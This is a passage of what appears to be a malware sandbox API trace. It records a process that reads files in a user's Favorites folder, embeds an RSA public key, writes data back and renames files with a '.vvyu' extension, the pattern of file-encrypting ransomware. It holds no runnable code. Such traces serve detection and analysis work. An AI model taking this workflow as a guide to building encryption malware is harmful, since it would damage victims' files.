| out: hHeap=0x6a0000) returned 1 [0189.535] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0189.535] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0189.536] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3bb48 | out: hHeap=0x6a0000) returned 1 [0189.536] GetCurrentThreadId () returned 0x264 [0189.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0189.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d43d30 [0189.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0189.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0189.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0189.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0189.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0189.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0189.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.536] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.536] GetCurrentThreadId () returned 0x264 [0189.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.537] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.537] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0189.537] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.537] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.537] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0189.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0189.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0189.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82b10 [0189.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0189.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0189.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0189.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a30 [0189.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0189.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0189.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0189.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0189.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0189.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0189.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0189.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0189.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d399d0 [0189.539] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0189.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0189.539] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0189.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0189.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0189.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0189.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0189.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d399e8 [0189.539] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0189.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0189.539] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0189.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d399b8 [0189.539] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0189.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39a48 [0189.539] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0189.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0189.539] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0189.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a18 [0189.539] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0189.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a00 [0189.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0189.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39a60 [0189.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a00 | out: hHeap=0x6a0000) returned 1 [0189.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39a00 [0189.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a18 | out: hHeap=0x6a0000) returned 1 [0189.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0189.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0189.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0189.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0189.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27b58 [0189.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399d0 | out: hHeap=0x6a0000) returned 1 [0189.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d399d0 [0189.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0189.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0189.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a30 | out: hHeap=0x6a0000) returned 1 [0189.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0189.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a60 | out: hHeap=0x6a0000) returned 1 [0189.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0189.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0189.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0189.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0189.541] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0189.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399d0 | out: hHeap=0x6a0000) returned 1 [0189.541] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0189.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0189.541] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0189.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0189.542] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0189.542] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0189.542] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0189.542] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0189.542] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0189.543] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0189.543] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0189.543] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0189.543] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0189.543] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a00 | out: hHeap=0x6a0000) returned 1 [0189.543] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0189.543] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a48 | out: hHeap=0x6a0000) returned 1 [0189.543] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0189.543] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399e8 | out: hHeap=0x6a0000) returned 1 [0189.543] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399b8 | out: hHeap=0x6a0000) returned 1 [0189.544] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0189.544] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0189.544] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0189.545] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399a0 | out: hHeap=0x6a0000) returned 1 [0189.545] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d392a0 | out: hHeap=0x6a0000) returned 1 [0189.545] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0189.545] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0189.546] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b10 | out: hHeap=0x6a0000) returned 1 [0189.546] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0189.546] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0189.546] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0189.546] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0189.546] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0189.547] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0189.547] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0189.547] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0189.547] WriteFile (in: hFile=0x584, lpBuffer=0x751d68*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x751d68*, lpNumberOfBytesWritten=0x30ffb14*=0x80, lpOverlapped=0x0) returned 1 [0189.548] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x751d68 | out: hHeap=0x6a0000) returned 1 [0189.548] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.548] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0189.549] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0189.549] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.549] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0189.549] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0189.549] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0189.549] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0189.550] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.550] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0189.550] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.550] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0189.550] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0189.551] CloseHandle (hObject=0x584) returned 1 [0189.552] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0189.552] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x870) returned 0x2d42908 [0189.552] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0189.552] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\msn websites\\msn.url"), lpNewFileName="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSN.url.vvyu" (normalized: "c:\\users\\keecfmwgj\\favorites\\msn websites\\msn.url.vvyu")) returned 1 [0189.553] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.554] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0189.554] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.556] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x794008 | out: hHeap=0x6a0000) returned 1 [0189.556] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 1 [0189.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8e) returned 0x794008 [0189.557] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.557] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSNBC News.url") returned=".url" [0189.557] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\msn websites\\msnbc news.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0189.557] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=133) returned 1 [0189.557] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0189.562] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.562] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0189.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0189.563] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0189.563] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0189.563] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x85, lpOverlapped=0x0) returned 1 [0189.564] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0189.564] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.564] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.564] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0189.565] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0189.565] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0189.565] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0189.565] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0189.565] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0189.565] GetLastError () returned 0x0 [0189.565] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0189.565] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0189.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0189.566] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0189.566] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0189.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0189.566] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0189.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0189.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0189.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x751d68 [0189.566] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0189.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0189.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0189.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0189.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0189.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0189.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d392a0 [0189.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d399a0 [0189.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d392e8 [0189.567] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d399b8 [0189.567] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d399e8 [0189.567] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a48 [0189.567] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a00 [0189.567] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0189.567] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0189.567] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3bb48 [0189.567] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0189.567] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399e8 | out: hHeap=0x6a0000) returned 1 [0189.567] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a00 | out: hHeap=0x6a0000) returned 1 [0189.567] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a48 | out: hHeap=0x6a0000) returned 1 [0189.567] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0189.568] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 